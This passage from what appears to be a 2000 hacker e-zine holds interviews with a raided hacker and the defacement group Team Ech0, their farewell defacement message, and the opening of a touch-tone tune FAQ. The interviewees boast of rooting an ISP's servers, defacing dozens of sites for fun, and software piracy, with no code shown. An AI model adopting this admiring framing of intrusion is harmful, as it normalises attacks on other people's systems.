      gear was confiscated), so we set up a telephone chat and below is the
      highlights of that conversation. Some chatter and personal chit-chat
      was deleted for brevity. Fuqrag has ok'd this for release. - Ed
      
      
      Phone interview with Fuqrag by Cruciphux
      
      Sat Feb 19th, 2:30pm   2000
      
      HWA = Cruciphux
      FR  = Fuqrag
      
      Transcript start
      
      
      <HWA>  how ya doin?
      
      <FR>   i got raided last thursday
      
      <HWA>  ah shit what happened or can u talk about it??
      
      <FR>   it was a bunch of bs. well.. let's see they didn't arrest me yet
      
      <HWA>  uhm, Ok.
      
      <FR>   just search and seizure shit
      
      <HWA>  they took shit?
      
      <FR>   yeah, all my shit
      
      <HWA>  you got receipts and all that? what did they take? 'everything' ?
             and whos they? feds? or police?
             
      <FR>   fbi, osi, nasa, and some dude from interpol
      
      <HWA>  nice
      
      <FR>   it's cool
      
      <HWA>  heavy shit then.so what did they say it was 'about'?specific boxes?
      
      <FR>   heavier than usual, they asked me all kinds of shit ...
             i'm gonna be indicted (when the time comes) on approx. 138 counts
             
      <HWA>  fuck.
      
      <FR>   and that's just in this country
      
      <HWA>  what else? who else wants you?
      
      <FR>   i hit a lot more systems than most realize, most i did.. were not
             about defacing and shit.             
             they're investigating me because of the nato shit
             
             
      <HWA>  yet ppl still hit gov sites and mil sites
      
      <FR>   ya
      
      <HWA>  What do they want to do?
      
      <FR>   it got really crazy when i started up my shit
      
      <HWA>  you're what? 17 right?
      
      <FR>   now it seems like there's twice as much as then b4 i started..
             nope 30.
             
      <HWA>  oh sorry, i'm 35 heh welcome to the old men's club heh.
      
      <FR>   it's ok, if u ever spoke to me.. or saw me.. u'd never guess i 
             was 30, shit.. u'd never believe that i was over 21 probably.
             
      <HWA>  you live alone/married?, family?
      
      <FR>   alone
      
      <HWA>  thats a plus in this case I suppose
      
      <HWA>  do you have a good lawyer? where are u located anyway btw?
      
      <FR>   in the states
      
      <HWA>  so you could lose alot then
      
      <FR>   it's cool cool
      
      <HWA>  they talking deals? a job offer? (laughs)
      
      <FR>   not yet
      
      <HWA>  they should
      
      <FR>   heh, i'm tryin to get a job with the nsa actually, (laughs)      
      
      <HWA>   some countries look at hackers/crackers as a "national 
              resource"... you seem pretty calm about the whole deal
              
      <FR>    well, what can ya do?! ya know? heh.
      
      <HWA>   true
      
      <FR>    just in case tho, i've started writing a book (laughs)
      
      <HWA>   good plan, if you write anything you want published i'll put
              it out under whatever conditions u want.
              
      <FR>    it's sorta like the "hacking exposed" shit... except, that i'm 
              showing people how to get into "any" webserver and/or internet 
              based system, period.. step-by-step. no matter what the OS
              
      <HWA>   the feds wouldn't like that,  many admins would tho, I know I 
              would.
      
      <FR>    ever heard of those ozemail.com.au people? they're pretty big..
      
      <HWA>   yes, not much tho
      
      <FR>    i rooted there mail.ozemail.com.au
      
      <HWA>   just recently got a new aussie contact maybe hear more from them.
      
      <FR>    and there ns's too.. and gonna show ppl how i did it, etc.. shit
              like that
      
      <HWA>   when did you start hacking then?
      
      <FR>    when i was 12
      
      <HWA>   your story should be pretty close to mine, you had the whole 
              underground bbs thing? fidonet boards and shit?
              
      <FR>    mostly bbs's and shit at that time tho ya
      
      <HWA>   yeah same here, ran a board for 18yrs if u can believe it
      
      <FR>    and qwikmail etc...
      
      <HWA>   yeap
      
      <FR>    damn that's a long ass time
      
      <HWA>   yeah
      
      <FR>    r u in the states?
      
      <HWA>   irc only came into existnce around 89 ppl don't realize that... 
              no, Canada.
      
      <FR>    that's cool, what kinds of articles does hwa do and shit, etc..?
      
      <HWA>   well we're doing the same shit HNN covers, looking for original 
              stuff when we can anything security/hack related and general tech
              and the exploitation of same
              
      <FR>    if u guys ever need any security/hacking/cracking, etc... articles
              or how-to's, or whatever... let me know i'd be more than willing to
              submit shit
              
      <HWA>   always, if u feel like writing just dive in and fire me the stuff 
              off
      
      <FR>    and i don't know everything.. but.. whatever i don't know, i'll 
              exploit it, just so i'd know it then.. ;)
              
      <HWA>   yeah! heh.
      
      <FR>    do u guys have a lot of readers?
      
      <HWA>   its hard to track, the mailing list that basically announces the 
              new issues has just shy of 500 members, then we have mirror sites
              all over the place including highprofile places like attrition and
              packetstorm among others so I don't really know. Considering I was
              doing it for my own enjoyment, the fact other ppl dig it too is an
              added bonus....I just wanted to have as much info as possible kept
              in one place.
              
      <FR>    well..i gotta go a for little while..talk atcha later.
      
      <HWA>   ok dude,  catchya later
      
      <FR>    take it easy
      
      <HWA>   you too.bye ..
      
      <END TRANSCRIPT>    
      
      (* TO be continued in later issues if possible. -Ed )
            
      
      @HWA
     
26.0 Exclusive: Interview with Team Ech0 (pre-bust and after bust)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Interview by SugarKing <un edited>
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~     
     
      Session Start: Sat Feb 19 22:31:42 2000
      Session Ident: team-ech0 (?????????@PPP???????????????.com)
      <team-ech0> Hi. I'm from a rep. from Team Echo.
      <SugarKing> hey
      <team-ech0> hey there.
      <SugarKing> first of all......you don't have to answer a question if you 
                  don't want to..
      <team-ech0> ok.
      <SugarKing> ok i'll start logging now then
      <team-ech0> aight.
      <SugarKing> how old are you and how long have you been hacking/computing?
      <team-ech0> Are you asking about me personally or the group?
      <SugarKing> doesn't matter....you i guess since i'm only interviewing you
      <SugarKing> :)
      <team-ech0> The group has members ranging from the teens to about the mid
                  twenties. We've all been computing since about 6.
      <team-ech0> I'll answer about the group.
      <SugarKing> how did you get into hacking?
      <team-ech0> I think that as time progresses and people learn more about 
                  computers it sort of comes naturally, at least if you are 
                  genuinely interested. It's natural to sort of "push the limits".
      <SugarKing> yeah
      <SugarKing> have you or any other members been in any other groups in the 
                  past?
      <team-ech0> I can't answer that because that'd imply who our members are 
                  :)
      <SugarKing> that kills my next question......how about how many members are 
                  there?
      <team-ech0> The whole idea is that the group tries to be anonymous, it's a
                  group, not a bunch of individuals
      <team-ech0> But I will answer that.
      <team-ech0> There are 6 members.
      <SugarKing> ok
      <SugarKing> you guys are from different countries telling from your website?
      <team-ech0> Which website are you referring to?
      <SugarKing> ech0.zort.org
      <team-ech0> hate to tell ya, but that's not ours.
      <team-ech0> hahaha
      <SugarKing> no? who's is it?
      <team-ech0> ech0 security != Team Echo
      <team-ech0> but check out this shitz0r: www.luresa.com
      <SugarKing> oh...sorry about htat:)
      <team-ech0> heh
      <SugarKing> those are all the sites you guys have defaced?
      <team-ech0> up to 2.13.00, since then I'd guess there have been around 20 
                  more
      <SugarKing> what is your reason for defacing?
      <team-ech0> mostly people say because "i wanna contribute to security, 
                  blah blah" but that's really an overused and groundless excuse.
      <team-ech0> I think the real reason is that we can.
      <team-ech0> It challenges us, it's something to do. Some of the defacements
                  even have a "message".
      <SugarKing> yeah...i've seen alot of your defacements.....some say you defaced
                  cause you were bored?
      <team-ech0> yeah.
      <team-ech0> that's correct.
      <SugarKing> do you use your own exploits or other people's?
      <team-ech0> a combination of the two.  Our group has coded many exploits 
                  though.
      <SugarKing> is team-ech0 affiliated with any other groups? any rivals or 
                  anything? I've seen a few flames at the 'Crime Boys'
      <team-ech0> yeah, just them.
      <team-ech0> we hate the 'Crime boys'
      <SugarKing> heh
      <team-ech0> but aside from that, we love everyone else
      <team-ech0> ;)
      <SugarKing> are you guys afraid of being raided?
      <team-ech0> it's definitely a possibility but I think that since we've done
                  mostly low-profile sites it's sort of out of the question.
      <SugarKing> so you guys don't do any gov or mil sites?
      <SugarKing> or just choose not to?
      <team-ech0> we avoid those. that's what'll get ya busted.
      <SugarKing> yeah i know...heh
      <team-ech0> you hear how fuqrag got raided?
      <SugarKing> no...when was this?
      <team-ech0> like 2 days ago
      <SugarKing> wow
      <team-ech0> got raided by the FBI, secret service and Interpol...ouch
      <SugarKing> HWA just did an interview with his last issue too
      <team-ech0> he's been indicted on 138 charges in the U.S. and a whole slew
                  internationally
      <SugarKing> him rather
      <SugarKing> jesus
      <team-ech0> i know
      <team-ech0> where can I read that interview?
      <SugarKing> http://welcome.to/HWA.hax0r.news
      <SugarKing> issue 49
      <team-ech0> ok.
      <SugarKing> you'll most likely be in issue 51
      <team-ech0> cool cool
      <SugarKing> what do you think about the whole DOS issue with Yahoo! and all
                  those other sites?
      <team-ech0> don't really care much about it...i'd love to see some of the
                  "mafiaboy" IRC logs tho 
      <SugarKing> so would I
      <team-ech0> heh
      <SugarKing> i have to ask this....but who does all your artwork? especially
                  the one with the purple sky.....gotta love that one
      <team-ech0> heh, various people send in art. you see the one with the X-files 
                  background?
      <team-ech0> it == leet
      <SugarKing> yeah I just saw that one about an hour ago
      <SugarKing> i like that one 
      <team-ech0> yea
      <SugarKing> this is my last question......don't wanna keep ya too long......
                  what plans does Team Ech0 have for the future? how long do plan 
                  on staying together, etc?
      <team-ech0> i'll just say that we will never die.
      <SugarKing> that just about sums it up:)
      <team-ech0> alright.
      <SugarKing> well thanks again for the interview
      <SugarKing> i didn't think you were going to even read my mail
      <SugarKing> nevermind actually accept the interview
      <SugarKing> have any greetz, plugs?
      <team-ech0> no problemo.
      <team-ech0> see ya.
      Session Close: Sat Feb 19 23:06:01 2000
     
     
     The farewell message on Team Ech0's final defacement:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     http://www.attrition.org/mirror/attrition/2000/02/25/www.citirealty.com/
     
     
     Ladies and Gentlman, fans, antagonists, and who ever else. 
     I have some disturbing news.  By this weekend, Team Echo will be no more.
     It is rumored   that one of our members known by Analognet has been busted
     by the Feds, and turned in by another of our kind,
     
     I can absolutely assure you that it wasn't one of us.  We were a family, 
     but now things have changed and we are heading our own seperate ways.  
     We have had some memorable moments, and they will always be archieved on
     Attrition.org (hopefully).  For those of you who still do not know who 
     was in Team Echo, your about to find out.  First there was me, I am the
     one the only Sys-Edit, then there was Political Genocide, The Unknown 
     Soldier, Bansh33, BusDr1v3r and last but not least Analognet.

     I hope we have given you some good laughs along the way, along with our
     expresseive political opinions.  Due to what has been rumored to transpire,
     we are no longer a team.  We are disbanding very soon.  Most of us will 
     just disappear into the night from which we came, others will go on to 
     big and better things, but just remember us sometime down the line.  

     First I would like to thank Phyre for some of our new art, and to the person
     who said the landscaped picture sux, FUCK YOU!!!!!!!!!!!!!!!  I made that you
     2 bit whore.

     I want to thank everyone who emailed us, fan and hatemail alike.   We recently
     recieved an email from some female in quebec, i am sorry that i didnt get to 
     reply to your email, but if you want mail me at Sys-Edit@excite.com english if
     you could, my french is horrible
                                                                                :o)

     Shouts: Zenomorph, Bansh33,Sh00tR,Analognet.......if your still out there., 
     Artech, Angel, Political Genocide, Digital Domination and everyone else whos
     been there in the past few months since our defacing began.

     "he was a good man he was a loving man. ehhh fuck it. peace bro" 
                                                           - Political Genocide

     "Fuck you Centauri and Fuck Spinux.net"- Bansh33

      Hey bastards get me out of here!!! - Analognet (this i can only assume)

      Fear not for us, we will survive, I believe that we will all be reborn some 
      time in the future.  Remeber Team Echo loves you!! - Sys-Edit

      We bid ye farewell...............

                                                                                                   
      Contact: sys-edit@excite.com
      
      
      The 'after bust' interview by SugarKing,
      
      
      For those of you who don't know Team Ech0 officially split up on Feb. 24,
      only 5 days after I did the interview with them. It had been rumored that
      one member who goes by the handle "Analognet" had been busted by the feds.
      Team Ech0 then decided to go their seperate ways. This interview was done on
      Feb. 27 with ech0 member "Sys-Edit". Some of it has been edited for obvious
      reasons.
      
      
      SugarKing: hey
      phtmphr34k: yo
      phtmphr34k: how you doing?
      SugarKing: good
      SugarKing: you?
      phtmphr34k: ok, dont feel like going to work tomorrow tho :)
      SugarKing: heh
      SugarKing: i don't feel like going to school
      SugarKing: just got off vacation....this week is going to suck
      phtmphr34k: trade?
      SugarKing: sure if I get paid:)
      phtmphr34k: you go do my admin job and ill go to school for you
      SugarKing: ahh your an admin?
      SugarKing: cool
      phtmphr34k: yeah not a head admin, yet
      phtmphr34k: wtf brb damn peope at my door
      SugarKing: oh
      SugarKing: ok
      phtmphr34k: ok man i hate door to door religious people
      SugarKing: haha me too
      phtmphr34k: whered i put my shot gun ;)
      SugarKing: so anyways....i'm guessing the rep I interviewed the first time
      was Bansh33?
      phtmphr34k: yeah
      phtmphr34k: i think might of been political genocide but im pretty sure it
      was bansh33
      SugarKing: so how did you guys hear that "Analognet" got busted?
      SugarKing: i'm pretty sure it was bansh33 from his ident
      phtmphr34k: well were not totally sure its only rumored
      SugarKing: so is that what made you guys decide to split?
      phtmphr34k: well thats part of the reason
      phtmphr34k: we made team echo to remain anonymous
      SugarKing: yeah and now everyone knows who is who:)
      phtmphr34k: too many people whine about this and that and we didn't want to
      hear it
      phtmphr34k: yeah
      SugarKing: it is kind of weird since you guys only did low-profile sites
      phtmphr34k: yeah well we do it for fun
      phtmphr34k: and an occasional political message
      SugarKing: yeah
      phtmphr34k: we had fun doing it
      phtmphr34k: and that was our main point
      SugarKing: what do you plan on doing now?
      phtmphr34k: well for right now im just gonna stay low for a little bit
      phtmphr34k: nothing really extravagent
      SugarKing: what about for the future....think you'll ever join another
      group?
      phtmphr34k: polit gen and bansh33 were thinking of starting another group,
      but for right now, im just gonna concentrate on work and securing that
      network
      SugarKing: yeah that's cool
      phtmphr34k: it depends really, if i do, ill change my handle and start anew,
      sys-edit is just my most recent handle
      SugarKing: that nick sounds familiar....did you have it before team ech0?
      phtmphr34k: yes, fightcrime.org was the last time i used it 12/31/99
      SugarKing: it's kind of coincidence since fuqrag got raided after HWA
      interviewed him
      SugarKing: now this....
      SugarKing: w'er bad luck..haha
      phtmphr34k: hey stop putting them paranoid thoughts in my head lol
      SugarKing: we're rather
      SugarKing: lol
      SugarKing: why did you guys choose to remain anonymous and why now did you
      come public with your handles?
      phtmphr34k: well some other people like to bitch and  moan about things and
      this and that, flame wars etc..., we're not really into that, though i will
      admint i did say something to the crime boys for their lack of ability.  As
      for coming out with our handles now, pretty much most on irc knew who we
      were so i figured what the hell everyone knows who we are anyway
      SugarKing: yeah
      SugarKing: you guys hang on EFnet? Undernet?
      phtmphr34k: you might be able to find bansh33 or polit genocide on their,
      but i left irc when we started t-e.  i liked being anonymous
      SugarKing: i'm always on efnet.....i hate AIM or ICQ
      SugarKing: the only reason i have AIM is because of my personal friends etc.
      SugarKing: most don't know WHAT IRC is.....hehe
      phtmphr34k: yeah same here, and icq
      phtmphr34k: right now im just working on gettinga new system and a dsl :x
      SugarKing: i wish i could get dsl
      SugarKing: i'm only on dialup
      SugarKing: it sucks
      phtmphr34k: cable modem is almost as good
      SugarKing: cable isn't as reliable though
      phtmphr34k: I would get that but, my cable company has no clue what that is
      phtmphr34k: true
      phtmphr34k: so im still on dial up also
      SugarKing: yeah dialup sucks...but it's all I can afford right now....unless
      we do trade school/work hehe
      phtmphr34k: i know what you mean
      phtmphr34k: i proxy through some univerisities around here once in a while
      hee hee
      SugarKing: heh
      SugarKing: i was a bit surprised to see that you guys were splitting
      SugarKing: cause i look at mostly all of your defacements
      phtmphr34k: i think everyone was
      phtmphr34k: we've gotten alot of mail about us
      SugarKing: i thought you guys were gonna around for awhile
      SugarKing: do you consider team ech0 as a come/go group?
      phtmphr34k: i was hoping to be but some people can't leave well enough
      alone, i won't mention names
      phtmphr34k: well if we could of remain anonymous, we would of been around
      for a long time
      SugarKing: ahh damn....brb.....gonna eat real quick:)
      phtmphr34k: ok ill be here
      SugarKing: ok.......back........gotta love turkey:)
      phtmphr34k: lol sour cream n onion chips with ice tea
      SugarKing: BBQ is better:)
      SugarKing: i use to love sour cream n onion chips but i got sick of them
      phtmphr34k: actually macaroni and cheese is the best, i just dont have any,
      ""note to self, tell mother to go to the store and buy some since im too
      lazy""
      SugarKing: hehe
      SugarKing: im a real lazy kid.....but oh well
      phtmphr34k: me too
      phtmphr34k: but i dont care either
      SugarKing: so how old are you exactly? from the how old interview it said
      members were from teens to mid-twenties? I'm guessing 22ish
      phtmphr34k: 20ish in may
      SugarKing: may what? my birthday is may 17th
      phtmphr34k: 29th
      phtmphr34k: memorial day this yr
      SugarKing: ahh
      SugarKing: may is a cool month
      phtmphr34k: yeah
      phtmphr34k: i told my mother to buy me some jd and smirnoff
      SugarKing: heh
      SugarKing: i just had a rough weekend myself
      SugarKing: underage drinking....gotta love it...lol
      phtmphr34k: yeah
      phtmphr34k: thing is, i dont get drunk
      SugarKing: neither do I.....i just get buzzed
      phtmphr34k: i can drink unlimited amounts of liquor and wont get drunk
      phtmphr34k: i dotn even get that
      SugarKing: that's a cool talent
      SugarKing: heh
      phtmphr34k: yeah, i just dont drink beer
      SugarKing: that's what I drink
      SugarKing: cause if I drink hard stuff i'll pass out in 5 minutes
      phtmphr34k: vodka or jd for me
      phtmphr34k: eat before you drink
      SugarKing: i do some occassional mixed drinks.....usually screwdrivers
      phtmphr34k: thats the shit
      SugarKing: that's what I do.....order a big sub or something
      phtmphr34k: on new years i drank half a bottle of jim beaam
      SugarKing: cool
      phtmphr34k: yeah, but i wont drink jim beam again
      SugarKing: the only really hard stuff i'll drink is vodka, jd, or some
      captain morgan's
      phtmphr34k: boston huh?
      SugarKing: yup
      phtmphr34k: i know a few people out that way
      phtmphr34k: do you hit the 2600 mtgs out there?
      SugarKing: yes, once
      SugarKing: and it was stupid
      SugarKing: i actually live 45 minutes from boston
      phtmphr34k: i got friends by the cape
      SugarKing: i live on the mass/new hampshire border
      phtmphr34k: alright
      SugarKing: oops
      SugarKing: ignore that:)
      SugarKing: mouse is acting up
      phtmphr34k: tell me, do you tech support for your friends too?
      phtmphr34k: no prob
      phtmphr34k: didnt kno wyou had beta
      phtmphr34k: would of suggested it
      SugarKing: well right now i'm not even able to get a job.....not 16 yet:)
      SugarKing: but when i turn 16 i am going to work for tech support at a local
      ISP
      phtmphr34k: cool
      phtmphr34k: man, i dont remember 13-17
      SugarKing: i'm turning 15 in may
      phtmphr34k: well except for computers and hockey
      phtmphr34k: cool
      phtmphr34k: hey you know about scsi cards?
      SugarKing: yeah not a whole lot though
      phtmphr34k: i just "borrowed" a card from work but adaptec doesn't have the
      proper software on their site, i need to change hte irq from 13(math co
      processor ) to my open of 9
      phtmphr34k: ima bout to kill em
      SugarKing: wouldn't know how heh
      phtmphr34k: dam
      phtmphr34k: guess i gotta play with the dipswitches
      SugarKing: anyways.....back to the reason I IM'd you the first
      place......this interview is probably the longest in history......heh
      phtmphr34k: lol probably
      SugarKing: how did you guys contact each other?
      SugarKing: if you never used IRC that is
      phtmphr34k: i knew analog net for about 3 years, way back on an isp
      phtmphr34k: and we've done some stuff in the past (also on attrition)
      phtmphr34k: and i was talking to him on aim and he said we should form a
      group and become anon, so I was like alright
      SugarKing: where did you guys meet the other members?
      phtmphr34k: i met political genocide on irc, also bansh33, but analognet was
      the one who brought them in
      phtmphr34k: and our anonymous member who likes political issues, I went to
      highschool with him
      SugarKing: that's cool
      SugarKing: i only know a few kids in my high school that know some stuff
      about computers
      SugarKing: other than that they are AOL kiddies
      phtmphr34k: well at the time he was a major dick
      phtmphr34k: but the marines changed that
      SugarKing: ahh
      SugarKing: according to the first interview bansh said that all members were
      on computers since age 6??
      phtmphr34k: that sounds about right to me
      SugarKing: i've only been on computers since i was maybe 9
      phtmphr34k: i built my first one at 8, old ibm dos 286  2 ram 50meg hd
      SugarKing: back on a commodore 64
      SugarKing: wow that's pretty amazing
      phtmphr34k: atari 2600 :)
      SugarKing: heh
      phtmphr34k: actually i had pong built into a tv
      SugarKing: cool
      SugarKing: what languages do you could in?
      SugarKing: code*
      SugarKing: could..hehe
      phtmphr34k: well I was doing C for a while
      phtmphr34k: slowly going over to c++
      phtmphr34k: used to do basic and assembly
      phtmphr34k: working on vb, and java
      phtmphr34k: just dont have as much time as i used to with my job
      SugarKing: i have vb software but i don't think i'll learn it since it
      really is useless
      SugarKing: since it's not portable at all
      phtmphr34k: very true
      phtmphr34k: but id like it for my own knowledge
      SugarKing: yeah
      SugarKing: i am focusing on perl
      phtmphr34k: yeah ill get around to that eventually
      SugarKing: then i'm probably going to learn C
      phtmphr34k: c is boring
      phtmphr34k: ZZZZZZZZZzzz
      SugarKing: heh
      phtmphr34k: c++ is just mainly shortcuts
      SugarKing: i actually bought a C++ book before I even knew anything about C
      SugarKing: which was sort of a bad idea
      SugarKing: I know some c++
      phtmphr34k: yeah i know what ya mean
      SugarKing: btw hopefully you saved that art you guys used for
      defacements....was really cool
      SugarKing: especially the X-files on...I saved that one on my hd....put it
      on a disk too
      SugarKing: heh
      phtmphr34k: yeah, i did the first one with the terrain @ nite
      phtmphr34k: and i did the one on the very last hack
      phtmphr34k: and a guy named Phyre did most of the rest
      SugarKing: yeah that one is cool too
      phtmphr34k: there was another but they never left their handle
      SugarKing: what did you use to make it?
      phtmphr34k: bryce 3d and photoshop 5.5 on the first and photoshop on the 2nd
      one
      phtmphr34k: ill be designing a few for my current handle and a few for my
      new handle
      SugarKing: i have photoshop 4.0 on CD but I don't have it installed....it's
      old...
      SugarKing: i use paint shop pro
      SugarKing: i don't really like it though
      phtmphr34k: i got 5.5 on cd
      phtmphr34k: install 4.0 and get plugins
      SugarKing: yeah true
      phtmphr34k: i have about 60 megs in plugins
      SugarKing: hehe
      SugarKing: how big is your hd?
      phtmphr34k: if you have an ftp server or space somewhere if i get some time
      ill upload some to youu
      phtmphr34k: 7.3 gigs 2 hdd
      phtmphr34k: till i get the $$ for my new comp
      SugarKing: what os's do you run?
      SugarKing: i see your on windows now
      phtmphr34k: windows on this box
      phtmphr34k: and im trying to get my friends old box to put linux back on
      SugarKing: ahh
      SugarKing: i'm dual booting 98 and redhat
      phtmphr34k: my other linux box died
      SugarKing: heh
      phtmphr34k: i have caldera i have to install yet
      phtmphr34k: once i get my new computer i will own the world :x
      SugarKing: hehe
      phtmphr34k: 800mhz, 256 ram, 2 40 gig hd's
      phtmphr34k: burner
      phtmphr34k: 3d card
      SugarKing: sweet
      phtmphr34k: nic,56k dial up
      SugarKing: my system sucks
      phtmphr34k: dual boot win2k and red hat
      phtmphr34k: wanna talk about sux
      SugarKing: i'm gonna put all new shit in it though
      SugarKing: when i get money
      SugarKing: heh
      phtmphr34k: p1 200, 64 ram, 2 hds (503 meg after i fucked up) and a 6.8,
      33.6 modem, have a 56k but cant use it
      phtmphr34k: my sound card rox tho 64 biy
      phtmphr34k: bit*
      SugarKing: cool
      phtmphr34k: yeh
      phtmphr34k: ill need it for all my pirated software
      phtmphr34k: + what im pirating tomorrow from work
      SugarKing: i cant pirate since i'm on dialup unless i wanna sit here and
      download a big program for a few days
      phtmphr34k: i used to do that
      phtmphr34k: now i do it from work and burn it
      SugarKing: that's what I need too.......a burner
      phtmphr34k: oh i also want to mention about our email
      phtmphr34k: now some people might think us media wh0res because of the email
      addy we left, but thats not the case, we left it if the admin wanted to
      contact us, and some fan/hate mail doesn't hurt either :-)
      phtmphr34k: yeah their nice, need one at home :)
      SugarKing: yeah most groups don't leave an e-mail
      SugarKing: it worked out though since i contacted you guys for an interview
      phtmphr34k: yeah
      SugarKing: i've been contacting alot of people lately for interviews
      SugarKing: even the crime boys
      phtmphr34k: heh
      phtmphr34k: no talent hacks
      SugarKing: but i don't think they'll accept since they can't even speak
      english
      SugarKing: heh
      phtmphr34k: i think ive only seen about 2 or 3 original sites done by them,
      most are rehacks
      SugarKing: eh?
      SugarKing: i've never noticed
      phtmphr34k: yeah
      phtmphr34k: thats why attrition has #2 #3
      SugarKing: you guys did a pretty good number of defacements
      phtmphr34k: weve done that once or twice but didnt know
      SugarKing: little over 50
      phtmphr34k: actually 64 i believe
      SugarKing: ahh
      phtmphr34k: i did one way back that didn't get archieve
      SugarKing: did you guys ever deface a particular server or just random?
      phtmphr34k: the american dental association
      phtmphr34k: random
      SugarKing: heh
      phtmphr34k: i save all the ones i do on my drive just for personal records
      SugarKing: do you consider yourself a script kiddie or a true hacker?
      phtmphr34k: in my opinion im a true hacker, though some but not all the
      methods i use are that of a script kiddie
      phtmphr34k: i dont go braggin about what network ive compromised
      phtmphr34k: id like to stay out of jail
      SugarKing: heh
      SugarKing: yeah
      phtmphr34k: so on my defacements people could call me a script kiddie, but i
      don't care about their opinions
      phtmphr34k: i deface cuz its fun, its a hobby and it relieves stress
      SugarKing: do you feel that your contributing to security while doing it?
      phtmphr34k: yeah, i always close the holes up i enter through
      phtmphr34k: half the time i leave the admin a note letting them know their
      problem
      SugarKing: has an admin ever contacted you back?
      phtmphr34k: yes
      SugarKing: that's cool
      phtmphr34k: i believe it was one from weatherford.com
      SugarKing: oh
      phtmphr34k: he said something along the lines of : thanks for the hack, now
      I can tell our firewall admin that we need better security
      SugarKing: that's good
      SugarKing: which is true
      phtmphr34k: i use a firewall and im only on a dial up service
      SugarKing: i use a cheap one e.g. nukenabber etc.
      phtmphr34k: i use black ice
      SugarKing: just to log those packet kiddies that think it's fun on IRC
      phtmphr34k: yeah, i get the occasional netbus scan, subseven, etc.
      SugarKing: so do you think team ech0 will ever come back? possibly under a
      new name etc.?
      SugarKing: yeah
      SugarKing: lamers
      phtmphr34k: hard to say, i can tell you he members will resurface
      phtmphr34k: most defintely under new names
      SugarKing: what about you? you think you'll resurface?
      phtmphr34k: defintely, i think ill be doing a site tonite
      phtmphr34k: but i need a jpg/gif first
      SugarKing: nice
      SugarKing: ahh yeah
      phtmphr34k: but we were talking about forming another group, just im not
      ready for that yet, i like my handle right now
      phtmphr34k: I am just hoping that analognet is alright, I hope hes not some
      bodys bitch
      SugarKing: why didn't you guys just continue but under a new name?
      SugarKing: haha
      phtmphr34k: we figure well let things die down a little bit for now
      phtmphr34k: you may see us again by summers end
      SugarKing: cool
      SugarKing: well thanks for the interview and good luck..
      phtmphr34k: np...see ya

      
      @HWA


27.0  Phreaking good fun with DTMF and other goodies.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://twpyhr.usuck.com/
      Maintainer: Jennifer Martino
      
      Archive-Name:      The Unofficial Touch Tone Tune FAQ
      Last-Modified:     1999/12/29
      Version:           1.0
      Maintainer:        Jennifer Martino <jennmartino@my-deja.com>
      URL:               http://members.xoom.com/twpyhr0/tttfaq.html
           
      Compiled for:      The Web Page You Have Reached 
                         http://members.xoom.com/twpyhr0/
      
      
      
                                                         ___________
              The Unofficial Touch Tone Tune FAQ        /  _     _  \
                   (Well.. not really...)              |__[ L___I ]__|
                                                         |         |
                   ,@@@,            ,@@@@@,              |   :::   |
                ,@@"   "@@@,     ,@@"     "@@@,    ,@@@@"|   :::   |
          "@@@@@"          "@@@@@"            "@@@@"     '========='
                        original ascii art by joan stark
                      slightly modified by jennifer martino
      
      
      ______________________________________________________________________
                                                         
      1. What are touch tones?
      
         (From the TELECOM Digest FAQ
         http://hyperarchive.lcs.mit.edu/telecom-archives/)
      
         The touch tone system uses pairs of tones to represent the various
         keys. There is a "low tone" and a "high tone" associated with each
         button (0 through 9, plus * (star) and # (the thing that's called
         various names: octothorp(e), hash, number sign, "pound" symbol). The
         low tones vary according to what horizontal row the tone button is
         in, while the high tones correspond to the vertical column of the
         tone button.
      
      
      2. Which frequencies are used for the tones?
      
         (From the TELECOM Digest FAQ
          http://hyperarchive.lcs.mit.edu/telecom-archives/)
      
         The tones and assignments are as follows:
      
                1     2     3     A  :  697 Hz
      
                4     5     6     B  :  770 Hz
                                                 (low tones)
                7     8     9     C  :  852 Hz
      
                *     0     #     D  :  941 Hz
              ----  ----  ----  ----
              1209  1336  1477  1633 Hz
                     (high tones)
      
         When the 4 button is pressed, the 770 Hz and 1209 Hz tones are sent
         together. The telephone central office will then decode the number
         from this pair of tones.
      
         The tone frequencies were designed to avoid harmonics and other
         problems that could arise when two tones are sent and received.
         Accurate transmission from the phone and accurate decoding on the
         telephone company end are important. They may sound rather musical
         when dialed (and representations of many popular tunes are 
         possible), but they are not intended to be so.
      
         The tones should all be +/- 1.5% of the specified frequency. The
         high frequency tone should be at least as loud, and preferably
         louder than the low frequency. It may be as much as 4 dB louder.
         This factor is referred to as "twist."  If a Touchtone signal has
         +3db of twist, then the high frequency is 3 dB louder than the low 
         frequency. Negative twist occurs when the low frequency is louder.
      
      
      3. What are touch tone tunes?
      
         Touch tone tunes are songs played in touch tones.
      
      
      4. What's the point?
      
         Amusement. Annoyance.
      
      
      5. Where did you find them?
      
         Most are from "The Canonical List of Touch-Tone Phone Songs" which
         was maintained by Keith Maddock, some are from "The Push Button
         Telephone Song Text File" by The Craze, some are from an article
         by the United Phone Losers (http://www.phonelosers.net), some are
         from Steve Prior's website 
         (http://users.javanet.com/~sprior/) and a few were 
         submitted to me for my web page.
      
      
      6. Can I download sound files of touch tone tunes?
      
         The files with a <= after the title are available for download at
         http://members.xoom.com/twpyhr0/files9.html.
      
      
      7: How do you read the entries?
      
         Be sure you are viewing this FAQ with a fixed width font (such as
         courier new) otherwise text will not line up correctly.
      
         Here is an example of an entry. My comments, which follow what I am
         explaining, are in brackets.
      
      (1) [number of the entry] Happy Birthday [Title] <= [There is a sound
                                                          file available to
                                                          download at
                                 http://members.xoom.com/twpyhr0/files9.html]
      Credits: Steve Prior (http://users.javanet.com/~sprior/)
               [credit and url for the first entry, the first line of numbers
                above each line of the song]
               The Craze [credit for the second entry, the second line of
                          numbers above each line of the song]
               Tina R. Jones / Keith Murdock [credit for the third entry, the
                                              third line of numbers above 
                                              each line of the song]
      
      1   1     2    1   6    3 [Numbers to press for the notes. First
                                 version of the first line for this song. 
                                 Steve Prior is given credit for this line.]
      4   4     2    4   #    8 [Numbers to press for the notes. Second
                                 version of the first line for this song. The
                                 Craze is given credit for this line.]
      1   1     2    1   6    3 [Numbers to press for the notes. Third
                                 version of the first line for this song.
                                 Tina R. Jones / Keith Murdock is given
                                 credit for this line.]
